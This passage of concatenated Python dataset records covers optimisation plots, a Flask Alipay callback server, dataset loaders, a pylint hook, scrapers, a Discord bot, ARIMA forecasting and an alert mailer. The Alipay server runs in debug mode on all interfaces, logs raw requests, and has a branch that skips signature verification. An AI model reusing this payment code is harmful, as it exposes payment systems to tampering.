first dimension does not divide by zero\r\n        val2 = 1.0\r\n        for d in range(30):\r\n            val2 *= np.cos(X[0,d]/np.sqrt(float(d + 1)))\r\n        return val - val2 + 1.0\r\n    \r\n    bounds = []\r\n    bests = []\r\n    swarm = Swarm(20, 30)\r\n    swarm.setParam(2.0, 2.0, 0.8, Griewank)\r\n    ws = []\r\n    for i in range(30):\r\n        ws.append([-600.0, 600.0]) \r\n    swarm.initParticles(ws)\r\n    \r\n    runPlan = [250]\r\n    for r in runPlan:\r\n        for t in range(r):\r\n            swarm.update()\r\n            #print swarm.globalbestFitness\r\n        \r\n        bounds.append(swarm.bound)\r\n        bests.append(swarm.globalbestFitness)\r\n    \r\n    dataLen = len(bounds)\r\n    fig = plt.figure()\r\n    ax1 = fig.add_subplot(111)\r\n    ax1.plot(np.arange(dataLen), bounds,'r',label=\"bound\")\r\n    ax1.legend(loc=1)\r\n    ax1.set_title(\"Griewank\")\r\n    ax1.set_ylabel('bound value')\r\n    ax1.set_xlabel('runs')\r\n    ax2 = ax1.twinx() # this is the 
important function\r\n ax2.plot(np.arange(dataLen), bests, 'g',label = \"best\")\r\n ax2.legend(loc=2)\r\n #ax2.set_xlim([0, np.e]);\r\n ax2.set_ylabel('best value')\r\n plt.show()","sub_path":"etc/PSO-Conv/C4.py","file_name":"C4.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"475443488","text":"from flask import Flask,request,render_template\nimport time\nfrom alipay import AliPay\nfrom app import getAlipay\nfrom pay import buy_get\napp = Flask(__name__)\napp_private_key_string = open(\"rsa_private_key.pem\").read()\nalipay_public_key_string = open(\"rsa_public_key.pem\").read()\nalipay = AliPay(\n appid='201807*****500495', \n app_notify_url='http://119.17.171.238:8080/', # 默认回调url\n app_private_key_string=app_private_key_string,\n alipay_public_key_string=alipay_public_key_string, # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n sign_type=\"RSA2\", # RSA 或者 RSA2\n debug=False # 默认False\n)\n@app.route('/',methods=['POST'])\ndef hello_world():\n\tdata = request.form.to_dict()\n\tprint(data)\n\twith open(str(time.time())+\".txt\",'w+') as f:\n\t\tf.write(str(data))\n\tif request.form.get('status')=='buy':\n\t\treturn buy_get(request.form.get('buy_num'))\n\tsignature = data.pop(\"sign\")\n\tsuccess = alipay.verify(data, signature)\n\tprint(success)\n\tif success and data[\"trade_status\"] in (\"TRADE_SUCCESS\", \"TRADE_FINISHED\" ):\n\t\tif request.form.get('trade_status')=='TRADE_SUCCESS':\n\t\t\tbuy_id=request.form.get('buyer_id')\n\t\t\tbuy_num=request.form.get('receipt_amount')\n\t\t\tprint('单号:%s'%buy_id)\n\t\t\tprint('金额:%s'%buy_num)\n\t\t\tprint(type(buy_num))\n\t\t\tgetAlipay(buy_id,float(buy_num)*0.97)\n\n\t\t# getAlipay(request.form.get('buyer_id'),request.form.get('receipt_amount')*0.97)\n\treturn 'success'\n@app.route('/',methods=['GET'])\ndef index():\n\treturn render_template('index.html')\n# \treturn '''\n# \t\n# \n# \n# \n# \n#\n# \t'''\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n","sub_path":"huabei_alipay/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"496249858","text":"import torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport numpy as np\nimport pandas as pd\nimport os\nfrom PIL import Image\n\nclass EgoDexter(Dataset):\n '''Link to dataset: http://handtracker.mpi-inf.mpg.de/projects/OccludedHands/EgoDexter.htm'''\n \n def __init__(self, config):\n self.root_dir = config['path']\n \n self.samples = get_image_names(self.root_dir)[:100]\n \n self.transform_image = transforms.Compose([\n transforms.CenterCrop((480,480)), \n transforms.Resize((128,128)), \n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n \n print('Images in EgoDexter dataset: {}'.format(len(self.samples)))\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n \n img_name = self.samples[idx]\n image = Image.open(self.root_dir + img_name)\n image = self.transform_image(image)\n \n\n return {'image': image}\n\n \ndef get_image_names(root_dir): \n #folder = 'Fruits'\n #img_names = os.listdir(root_dir + folder + '/color/')\n #img_names = [folder + '/color/' + x for x in img_names] \n #img_names = np.sort(img_names)\n \n \n \n img_names = np.array([])\n for folder in os.listdir(root_dir):\n images = os.listdir(root_dir + folder + '/color/')\n images = [folder + 
'/color/' + x for x in images]\n img_names = np.hstack((img_names, images))\n \n img_names = np.sort(img_names)\n return img_names\n\n\n","sub_path":"dataset/egodexter_unlabelled.py","file_name":"egodexter_unlabelled.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"426527780","text":"#!/usr/bin/env python\n\"\"\"Git pre-commit hook to run pylint on python files.\n\nfrom https://gist.github.com/nivbend/7e0e306a98138916b3c9#file-run_pylint-py\n\"\"\"\n\nfrom subprocess import check_output, CalledProcessError\nfrom sys import stderr\nfrom pathlib import Path\n\n(SUCCESS,\n GIT_DIFF_ERROR,\n PYLINT_ERRORS) = range(3)\n\nPYLINTRC = \".pylintrc\"\n\n\ndef _print_error(message):\n \"\"\"Print an error message to stderr.\"\"\"\n print(message, file=stderr)\n\n\ndef _is_python_script(myfile):\n \"\"\"Return true for *.py files and python scripts (\"#! /path/to/python\").\"\"\"\n if not myfile.is_file():\n return False\n\n if not myfile.suffix == '.py':\n try:\n with open(myfile, 'r') as contents:\n first_line = contents.readline()\n except OSError:\n return False\n\n # Check shebang.\n if not (first_line.startswith('#!') and 'python' in first_line):\n return False\n\n return True\n\n\ndef run():\n \"\"\"Verify changed python files using pylint.\"\"\"\n # Get all changed files' paths.\n gitdiff = ['git', 'diff', '--staged', '--name-only', 'HEAD']\n try:\n changed_files = (\n Path(file) for file in check_output(gitdiff).decode().splitlines()\n )\n except CalledProcessError:\n _print_error(\"Couldn't get list of changed files\")\n return GIT_DIFF_ERROR\n\n # Limit checks to python scripts only.\n changed_files = [\n filename for filename in changed_files\n if _is_python_script(filename)\n ]\n\n if changed_files:\n try:\n check_output(['pylint', *changed_files])\n except CalledProcessError as error:\n _print_error(error.output)\n _print_error('pylint returned errors, aborting commit.')\n return PYLINT_ERRORS\n\n return SUCCESS\n\n\nif __name__ == \"__main__\":\n exit(run())\n","sub_path":".config/git/templatedir/hooks/pre-commit.d/check_pylint.py","file_name":"check_pylint.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224234657","text":"import pandas as pd \r\nimport sqlite3\r\nimport datetime \r\nimport datetime\r\nfrom sqlalchemy import create_engine\r\n\r\nconn = sqlite3.connect('/home/shubhankar/.virtualenvs/trader/heroku/bseData.db')\r\ndf = pd.read_sql('SELECT SecurityCode FROM tbCoMapping',conn)\r\nk = df['SecurityCode'].drop_duplicates().tolist()\r\n\r\nfor i in k:\r\n\turl = 'https://api.bseindia.com/BseIndiaAPI/api/DwnldExcelIT15/w?scripcode={0}&fromdt=&todt=&flag=InsiderTrade15'\r\n\ttry:\r\n\t\tdf2 = pd.read_csv(url.format(i),parse_dates=['Reported to Exchange'])\r\n\texcept Exception as e:\r\n\t\tprint('Error getting data for {0}, moving on..'.format(i))\r\n\t\tcontinue\r\n\tprint('Gathering data for {0}'.format(i))\r\n\tma_list =\t[\r\n\t\t'SecurityCode',\r\n\t\t'SecurityName',\r\n\t\t'NameofPerson',\r\n\t\t'Categoryofperson',\r\n\t\t'TypeofSecuritiesBefore', \r\n\t\t'NumShareholdingBefore',\r\n\t\t'PctShareholdingBefore', \r\n\t\t'TypeofSecuritiesTransacted', \r\n\t\t'NumberofSecuritiesTransacted', \r\n\t\t'ValueofSecuritiesTransacted', \r\n\t\t'TransactionType', \r\n\t\t'TypeofSecuritiesAfter',\r\n\t\t'NumShareholdingAfter', \r\n\t\t'PctShareholdingAfter', \r\n\t\t'TransactionDateFrom', 
\r\n\t\t'TransactionDateTo', \r\n\t\t'DateofIntimationtoCompany', \r\n\t\t'ModeofAcquisition', \r\n\t\t'DerivativeType', \r\n\t\t'DerivativeContractSpec', \r\n\t\t'DerivativesBuyValue', \r\n\t\t'DerivativesBuyUnits', \r\n\t\t'DerivativesSaleValue',\r\n\t\t'DerivativesSaleUnits', \r\n\t\t'Exchange', \r\n\t\t'ReportedtoExchange'\r\n\t]\r\n\tengine = create_engine('sqlite:////home/shubhankar/.virtualenvs/trader/local/myapp2/site.db')\r\n\tdf2.columns= ma_list\r\n\tdf2.to_sql('Filings',con=engine,if_exists='append',index=False)\r\n\t# db.session.add(df2)\r\n\tprint('Completed data for {0}'.format(i))\r\n# db.session.commit()","sub_path":"InsiderTrades/getInsiderDataH.py","file_name":"getInsiderDataH.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"257526394","text":"import logging\nfrom json import loads\n\nfrom discord import Embed\nfrom datetime import datetime\n\nfrom discord.ext import commands, menus\n\n\ndiff_emotes = { # Will put actual emotes here when I can be arsed\n \"easy\": \"Easy\",\n \"normal\": \"Normal\",\n \"hard\": \"Hard\",\n \"expert\": \"Expert\",\n \"expertPlus\": \"Expert Plus\",\n}\n\n\nasync def diff_sort(difficulties):\n diff_order = [\"easy\",\"normal\",\"hard\",\"expert\",\"expertPlus\"]\n diff_copy = [\"easy\",\"normal\",\"hard\",\"expert\",\"expertPlus\"]\n for diff in diff_order:\n if diff not in difficulties:\n diff_copy.remove(diff)\n return [x for _,x in sorted(zip(difficulties,diff_copy))]\n\n\nclass SearchMenu(menus.ListPageSource):\n def __init__(self, data, embed):\n super().__init__(data, per_page=6)\n self.embed = embed\n\n async def format_page(self, menu, entries):\n self.embed.clear_fields()\n self.embed.set_footer(text=f\"Page {(menu.current_page+1)}/{self.get_max_pages()}\")\n gap_check = True\n for entry in entries:\n self.embed.add_field(\n name=entry[0],\n value=entry[1],\n inline=True\n )\n if gap_check is True:\n self.embed.add_field(\n name=\"\\u200b\",\n value=\"\\u200b\",\n inline=True\n )\n gap_check = False\n else:\n gap_check = True\n return self.embed\n\n\nclass BeatSaver(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n\n async def cog_before_invoke(self, ctx):\n logging.info(f\"Invoked {ctx.command} in {ctx.guild.name} by {ctx.author.name}\\nArgs: {ctx.args}\" )\n\n async def cog_after_invoke(self, ctx):\n logging.info(f\"Concluded {ctx.command}\")\n\n\n @commands.cooldown(1, 5, commands.BucketType.user)\n @commands.group(invoke_without_command=True, aliases=[\"bs\",\"bsr\"])\n async def beatsaver(self, ctx, key, diff=None):\n async with ctx.channel.typing():\n async with self.bot.session.get(f\"https://beatsaver.com/api/maps/detail/{key}\") as resp:\n if await resp.text() == \"Not Found\":\n raise commands.BadArgument\n response = loads(await resp.text())\n difficulties = list()\n for x in response[\"metadata\"][\"difficulties\"]:\n if response[\"metadata\"][\"difficulties\"][x] is True:\n difficulties.append(x)\n difficulties = await diff_sort(difficulties)\n if diff is not None and diff in difficulties:\n diff_stats = response[\"metadata\"][\"characteristics\"][0][\"difficulties\"][diff]\n else:\n diff = difficulties[-1]\n diff_stats = response[\"metadata\"][\"characteristics\"][0][\"difficulties\"][diff]\n if response[\"metadata\"][\"songSubName\"] == '':\n title = response[\"metadata\"][\"songName\"]\n else:\n title = response[\"metadata\"][\"songName\"]+\" - \"+response[\"metadata\"][\"songSubName\"]\n m, s = 
divmod(response[\"metadata\"][\"duration\"], 60)\n embed = Embed(\n title=title,\n url=f\"https://beatsaver.com/beatmap/{key}\",\n description=f\"**{response['metadata']['songAuthorName']}**\",\n colour=0x232325\n )\n embed.add_field(\n name=\"Map Stats\",\n value=f\"Duration: {m:02d}:{s:02d}\\nBPM: {response['metadata']['bpm']}\\nMapper: {response['metadata']['levelAuthorName']}\",\n inline=True\n )\n embed.add_field(\n name=\"BeatSaver Stats\",\n value=f\"🔑: {response['key']}\\n💾: {response['stats']['downloads']:,}\\n💯: {int(response['stats']['rating']*100)}%\\n📅: {(datetime.fromisoformat(response['uploaded'][:-1])).strftime('%Y/%m/%d')}\",\n inline=True\n )\n message=str()\n for difficulty in difficulties:\n message=f\"{message}\\n{diff_emotes[difficulty]}\"\n embed.add_field(\n name=\"Difficulties\",\n value=message,\n inline=True\n )\n embed.add_field(\n name=f\"Difficulty Stats {diff_emotes[diff]}\",\n value=f\"NPS: {round(diff_stats['notes']/diff_stats['length'],2)}\\nNJS: {diff_stats['njs']}\\nOffset: {round(diff_stats['njsOffset'],2)}\\nNotes: {diff_stats['notes']}\\n Bombs: {diff_stats['bombs']}\\n Obstacles: {diff_stats['obstacles']}\",\n inline=True\n )\n embed.add_field(\n name=\"Links\",\n value=f\"[Preview Map](https://skystudioapps.com/bs-viewer/?id={response['key']})\\n[Download Map](https://beatsaver.com/api/download/key/{response['key']})\\n[Song on Youtube](https://www.youtube.com/results?search_query={response['metadata']['songAuthorName'].replace(' ','+')}+{title.replace(' ','+')})\\n[Song on Spotify](https://open.spotify.com/search/{response['metadata']['songName'].replace(' ','%20')})\",\n inline=True\n )\n embed.set_image(url=\"https://beatsaver.com\"+response[\"coverURL\"])\n await ctx.reply(embed=embed)\n logging.info(\"successfully concluded beatsaver\")\n\n\n# https://beatsaver.com/api/search/text/0?q=nekopara&?automapper=1\n @beatsaver.command(aliases=[\"s\", \"map\"])\n async def search(self, ctx, *, query):\n async with ctx.channel.typing():\n query = query.replace(' ','%20')\n async with self.bot.session.get(f\"https://beatsaver.com/api/search/text/0?q={query}&?automapper=1\") as resp:\n response = loads(await resp.text())\n embed = Embed(colour=0x232325)\n embed.set_thumbnail(url=\"https://beatsaver.com\"+response[\"docs\"][0][\"coverURL\"])\n embed.set_author(\n name=\"BeatSaver Search\",\n url=f\"https://beatsaver.com/search?q={query}\"\n )\n data = list()\n for result in response[\"docs\"]:\n if result[\"metadata\"][\"songSubName\"] == '':\n title = result[\"metadata\"][\"songName\"]\n else:\n title = result[\"metadata\"][\"songName\"]+\" - \"+result[\"metadata\"][\"songSubName\"]\n if result['metadata']['levelAuthorName'] == \"Beat Sage\":\n author_emote = \"🤖\"\n else:\n author_emote = \"🥰\"\n difficulties = list()\n for x in result[\"metadata\"][\"difficulties\"]:\n if result[\"metadata\"][\"difficulties\"][x] is True:\n difficulties.append(x)\n difficulties = await diff_sort(difficulties)\n diff_message = str()\n for difficulty in difficulties:\n diff_message = f\"{diff_message} {diff_emotes[difficulty]}\"\n m, s = divmod(result[\"metadata\"][\"duration\"], 60)\n message = f\"\"\"🔑 {result['key']}\n {author_emote} {result['metadata']['levelAuthorName']}\n 💾 {result['stats']['downloads']:,}\n 💯 {int(result['stats']['rating']*100)}%\n ⏱ {m:02d}:{s:02d}\n 📅 {(datetime.fromisoformat(result['uploaded'][:-1])).strftime('%Y/%m/%d')}\n {diff_message}\n [BS Page](https://beatsaver.com/beatmap/{result['key']})\"\"\"\n data.append((title, message))\n pages = 
menus.MenuPages(source=SearchMenu(data, embed), clear_reactions_after=True)\n await pages.start(ctx)\n\n\n @beatsaver.error\n async def beatsaver_error(self, ctx, error):\n # The local error handler seems to print the errors and I'm not too sure why :/\n logging.info(\"beatsaver local error handler invoked\")\n if isinstance (error, commands.BadArgument):\n logging.info(\"BadArgument handler ran\")\n return await ctx.send(\"You've given a bad argument!\\nYou should totally try ``e970`` though <:AYAYATroll:839891422140432405>\")\n if isinstance (error, commands.MissingRequiredArgument):\n logging.info(f\"MissingRequiredArgument handler ran. Missing: {error.param.name}\")\n return await ctx.send(\"You didn't give a required argument.\\nYou should totally try ``e970`` though <:AquaTroll:845802819634462780>\")\n logging.info(\"Error unhandled by local handler\")\n return delattr(ctx.command, \"on_error\")\n\n\ndef setup(bot):\n bot.add_cog(BeatSaver(bot))","sub_path":"cogs/beatsaver.py","file_name":"beatsaver.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641603734","text":"import requests\nimport colorama\n\nfrom colorama import Fore, Back, Style\n\ndef processInput(input, recognizedKeyword):\n\n location = \"\"\n locationRecognized = False\n counter = 0\n\n\n for i in input:\n counter += 1\n\n i = i.lower()\n\n if i != recognizedKeyword and counter > 2:\n i = i + \" \"\n location += i\n locationRecognized = True\n\n tempLocation = location\n location = location.replace(\" \", \"+\")\n\n weather_service = \"http://wttr.in/\"\n\n response = requests.get(weather_service + location)\n\n print(response.text)\n print(\"WARNING: Weather only supports the today's forecast.\")\n\n if not locationRecognized:\n tempLocation = \"No location specification detected. 
Weather information gathered from IP address.\"\n\n    print(f\"\\n{Fore.BLACK}{Back.GREEN}Recognized Weather Location:{Style.RESET_ALL}{Style.BRIGHT}{Fore.RED}\" + \" \" + tempLocation + f\"{Style.RESET_ALL}\\n\")\n\n\n\n\n","sub_path":"modules/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368844538","text":"# U.S. consumer confidence index\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nimport seaborn as sns  # used for more advanced plotting than matplotlib alone\nimport matplotlib.pylab as plt  # used for plotting\n\nfrom scipy import stats\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom statsmodels.graphics.api import qqplot\n\nimport time\nimport sys\n\n# Train the model\n\n# 1. Data preprocessing\nSentiment = pd.read_csv('./examples/jd_bot/arima/confidence.csv', index_col='date', parse_dates=['date'])\n#index_col=0, parse_dates=[0]\nprint(\"head:\", Sentiment.head())\nprint(\"tail:\", Sentiment.tail())\n\n# Split into training and test data\nn_sample = Sentiment.shape[0]  # 2007 - 2017 = 12*13 = 132\nn_train = 120  # 2007 - 2016 = 12*12 = 120\nn_forecast = n_sample - n_train  # 12\nprint(\"n_sample:%d n_train:%d n_forecast:%d\" %(n_sample, n_train, n_forecast))\n\nts_train = Sentiment.iloc[:n_train]['confidence']\nts_test = Sentiment.iloc[n_train:]['confidence']\nprint(\"ts_train.head():\", ts_train.head())\nprint(\"ts_train.tail():\", ts_train.tail())\nprint(\"ts_test.head():\", ts_test.head())\nprint(\"ts_test.tail():\", ts_test.tail())\n\nsentiment_short = Sentiment.loc['2007':'2017']\nsentiment_short.plot(figsize = (12,8))\nplt.title(\"Consumer Sentiment\")\nplt.legend(bbox_to_anchor = (1.25,0.5))\nsns.despine()\n# difference once and drop the leading NaN, keeping a 1-D series so the\n# ACF/PACF plots below do not fail\nsentiment_short = sentiment_short['confidence'].diff(1).dropna()\n\n\n'''\n# 2. Differencing the time series (order d) - making the series stationary\nsentiment_short['diff_1'] = sentiment_short['confidence'].diff(1)\n# one time interval gives the first difference; differencing again gives the second difference\nsentiment_short['diff_2'] = sentiment_short['diff_1'].diff(1)\nsentiment_short.plot(subplots=True, figsize=(18, 12))\n\n\n# use the series made stationary by first-order differencing\nsentiment_short= sentiment_short.diff(1)\n# drop the helper columns before plotting, otherwise the next step raises ValueError: x is required to have ndim 1 but has ndim 2\ndel sentiment_short['diff_2']\ndel sentiment_short['diff_1']\n\nfig = plt.figure(figsize=(12,8))\nax1= fig.add_subplot(111)\ndiff1 = sentiment_short.diff(1)\ndiff1.plot(ax=ax1)\n\nfig = plt.figure(figsize=(12,8))\nax2= fig.add_subplot(111)\ndiff2 = sentiment_short.diff(2)\ndiff2.plot(ax=ax2)\n\n# 3.1 Plot the ACF (autocorrelation) and PACF (partial autocorrelation) separately\nfig = plt.figure(figsize=(12,8))\n\nax11 = fig.add_subplot(211)\nfig = sm.graphics.tsa.plot_acf(sentiment_short, lags=20,ax=ax11)\nax11.xaxis.set_ticks_position('bottom')\nfig.tight_layout()\n\nax22 = fig.add_subplot(212)\nfig = sm.graphics.tsa.plot_pacf(sentiment_short, lags=20, ax=ax22)\nax22.xaxis.set_ticks_position('bottom')\nfig.tight_layout()\n'''\n\n\n# 4.2 Visualization: a helper that combines the four diagnostic plots; call it with different parameters as needed\n# 3.2 Visualize the results\ndef tsplot(y, lags=None, title='', figsize=(14, 8)):\n\n    fig = plt.figure(figsize=figsize)\n    layout = (2, 2)\n    ts_ax = plt.subplot2grid(layout, (0, 0))\n    hist_ax = plt.subplot2grid(layout, (0, 1))\n    acf_ax = plt.subplot2grid(layout, (1, 0))\n    pacf_ax = plt.subplot2grid(layout, (1, 1))\n\n    y.plot(ax=ts_ax)\n    ts_ax.set_title(title)\n    y.plot(ax=hist_ax, kind='hist', bins=25)\n    hist_ax.set_title('Histogram')\n    sm.graphics.tsa.plot_acf(y, lags=lags, ax=acf_ax)\n    sm.graphics.tsa.plot_pacf(y, lags=lags, ax=pacf_ax)\n    [ax.set_xlim(0) for ax in [acf_ax, pacf_ax]]\n    sns.despine()\n    fig.tight_layout()\n    return ts_ax, acf_ax, pacf_ax\n\ntsplot(sentiment_short, title='Consumer Sentiment', lags=36)\n\n\nprint(\"#4. Build the model - parameter selection\")\n# 4. Build the model - parameter selection\nmodel_results = ARIMA(ts_train, order=(2,0,0)).fit()  # (p,d,q)\n#model_results = arima200.fit()\n\n# 4.1 Parameter search: iterate over the grid to find suitable parameters\np_min = 0\nd_min = 0\nq_min = 0\nd_max = 0\n\n#long time cost\n#p_max = 8\n#q_max = 8\n\n#less time cost\np_max = 4 #for test\nq_max = 4 #for test\n#failed : AIC:(4, 3) BIC:(1, 4)\n\n# Initialize a DataFrame to store the results, using the BIC criterion\nresults_bic = pd.DataFrame(index=['AR{}'.format(i) for i in range(p_min,p_max+1)],\n                           columns=['MA{}'.format(i) for i in range(q_min,q_max+1)])\n\nfor p,d,q in itertools.product(range(p_min,p_max+1),range(d_min,d_max+1),range(q_min,q_max+1)):\n    \n    if p==0 and d==0 and q==0:\n        results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = np.nan\n        continue\n    try:\n        model = ARIMA(ts_train, order=(p, d, q),)\n        results = model.fit()  # fit (estimate) the parameters of the model\n        print(\"p:%.2f d:%.2f q:%.2f results.bic:%.2f\\n\" %(p, d, q, results.bic))\n        results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = results.bic\n    except Exception:\n        continue\n\n#BIC result\nresults_bic = results_bic[results_bic.columns].astype(float)\n\nprint(\"Parameters selected by BIC:\", results_bic)\n\n# Plot the BIC heatmap:\nfig, ax = plt.subplots(figsize=(10, 8))\nax = sns.heatmap(results_bic,\n                 mask=results_bic.isnull(),\n                 ax=ax,\n                 annot=True,\n                 fmt='.2f',\n                 )\nax.set_title('BIC')\n\n# Model order selection criteria\ntrain_results = sm.tsa.arma_order_select_ic(ts_train, ic=[\"aic\", \"bic\"], trend=\"c\", max_ar=4, max_ma=4)\n#aic_min_order = train_results.aic_min_order\nbic_min_order = train_results.bic_min_order\n\nprint(\"BIC:\", bic_min_order)\n#BIC:(p,q) \n#BIC: (1, 4)\n\n#AIC:(4, 3) BIC:(1, 4) -> BIC: p = 1, q = 4 -> AR1 -> MA4\n# AR -> p; MA -> q \n\n#### \n\n\"\"\"\n#6. Model diagnostics\n#6.1 Residual checks\n\n#6.2 Autocorrelation check (Durbin-Watson test)\ndw_result = sm.stats.durbin_watson(model_results.resid.values)\nprint(\"Autocorrelation check (Durbin-Watson result):\", dw_result)\nprint(\"Interpretation: a D-W statistic close to 2 means no (first-order) autocorrelation, which is the desired outcome - the residuals should be uncorrelated!\")\n\n#6.3 Residual normality check (QQ plot)\nresid = model_results.resid  # residuals\nfig = plt.figure(figsize=(12,8))\nax = fig.add_subplot(111)\nfig = qqplot(resid, line='q', ax=ax, fit=True)\n\n#6.4 Residual white-noise check (Ljung-Box test)\nr,q,p = sm.tsa.acf(resid.values.squeeze(), qstat=True)\ndata = np.c_[range(1,41), r[1:], q, p]\n# white noise: most Prob(>Q) p-values should be greater than 0.05\ntable = pd.DataFrame(data, columns=['lag', \"AC\", \"Q\", \"Prob(>Q)\"])  # lag = order\nprint(table.set_index('lag'))\n\n\"\"\"\n\n# 7. Model forecasting\npredict_sunspots = model_results.predict('2017-01','2017-12', dynamic=True)\nfig, ax = plt.subplots(figsize=(12, 8))\nax = Sentiment.iloc[0:]['confidence'].plot(ax=ax)\npredict_sunspots.plot(ax=ax)\n\nplt.show()\n","sub_path":"examples/jd_bot/arima/test_arima_with_fit.py","file_name":"test_arima_with_fit.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143830176","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 19 15:11:44 2018\r\n\r\n@author: yihlo\r\n\"\"\"\r\n\r\nfrom mydf import *\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.base import MIMEBase\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom email import encoders\r\nimport smtplib\r\nfrom datetime import datetime, timedelta\r\nimport os\r\nimport io\r\nimport sys\r\nfrom stream_conf import my_conf\r\n\r\nsys.stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8', line_buffering=True)\r\nsys.stdout = 
io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', line_buffering=True)\r\ndf_detection = pd.read_csv('/data/data_analytics/final_history_dataset/stream_detection_CART.csv')\r\ndf_pred = pd.read_csv('/data/data_analytics/final_history_dataset/stream_CART_pred.csv')\r\ndf_pred_reason = pd.read_csv('/data/data_analytics/final_history_dataset/stream_CART_pred_reason.csv')\r\nfrom_addr = 'Bluetechnology_System@fareastone.com.tw'\r\nto_addr = my_conf.detection_mail_addr\r\n\r\ndef format_addr(s):\r\n name, addr = parseaddr(s)\r\n return formataddr((Header(name, 'utf-8').encode(), addr))\r\n\r\n################################################################################################\r\n################## 即時異常偵測通知 ########################\r\n################################################################################################\r\ntime = df_detection.time.max() \r\nif os.path.isfile('last_time_detection_mail'):\r\n last_time_send_mail = pd.read_csv('last_time_detection_mail').last_time_send_mail.astype('datetime64').iloc[0]\r\n time_diff = pd.Series(time).astype('datetime64').iloc[0] - last_time_send_mail\r\n can_send = time_diff.total_seconds() > my_conf.detection_mail_interval\r\nelse: \r\n can_send = True\r\nif df_detection.pred[df_detection.time == time].iloc[0] == 1 and can_send:\r\n reason = pd.read_csv('/data/data_analytics/final_history_dataset/CART_detection_reason/CART_detection_reason_{}.csv'.format(time.replace(':', '')), header = None)[0]\r\n reason = '\\n'.join(reason).replace(':0', ':正常').replace(':1', ':異常')\r\n text = '''\r\nHI ALL,\r\n 藍科機器學習系統於 {time} 偵測出 COH 系統有異常之現象發生,詳細原因如下:\r\n\r\n{reason}\r\n\r\n---------------------------------------------\r\n本郵件由系統自動發出,請勿回覆本郵件。\r\n'''.format(time = time, reason = reason)\r\n msg = MIMEText(text, 'plain', 'utf-8')\r\n msg['From'] = format_addr('藍科智慧管理員 <%s>' % from_addr)\r\n msg['To'] = ','.join(map(format_addr, to_addr))\r\n msg['Subject'] = Header('【即時異常偵測通知】【{}】COH 系統異常通知'.format(time), 'utf-8')\r\n\r\n smtp_server = '10.68.68.109'\r\n smtp_port = 25\r\n server = smtplib.SMTP(smtp_server, smtp_port)\r\n error_list = server.sendmail(from_addr, to_addr, msg.as_string())\r\n server.quit()\r\n if error_list == {} : \r\n pd.DataFrame({'last_time_send_mail': [time]}).to_csv('last_time_detection_mail', index = False)\r\n print('郵件發送成功 !')\r\n################################################################################################\r\n################## 異常預測通知 ########################\r\n################################################################################################\r\nif df_pred.time.max() == df_pred_reason.time.max():\r\n time = df_pred.time.max() \r\n pred_time_value = df_pred.pred.iloc[-1]\r\n pred_time_last_value = df_pred.pred.iloc[-2]\r\n pred_reason_value = df_pred_reason.pred[df_pred_reason.time == time].iloc[0]\r\n boo_send_1 = pred_time_value <= my_conf.pred_mail_level and pred_time_value > 0\r\n boo_send_2 = pred_time_last_value == 0 or pred_time_last_value > my_conf.pred_mail_level\r\n if boo_send_1 and boo_send_2:\r\n pred_time_reason = pd.read_csv('/data/data_analytics/final_history_dataset/CART_pred_time/CART_pred_time_{}.csv'.format(time.replace(':', '')), header = None)[0]\r\n pred_time_reason = '\\n'.join(pred_time_reason)\r\n pred_reason = pd.read_csv('/data/data_analytics/final_history_dataset/CART_pred_reason/CART_pred_reason_{}.csv'.format(time.replace(':', '')), header = None)[0]\r\n pred_reason = '\\n'.join(pred_reason)\r\n text = '''\r\nHI ALL,\r\n 藍科機器學習系統於 {time} 預測出 COH 
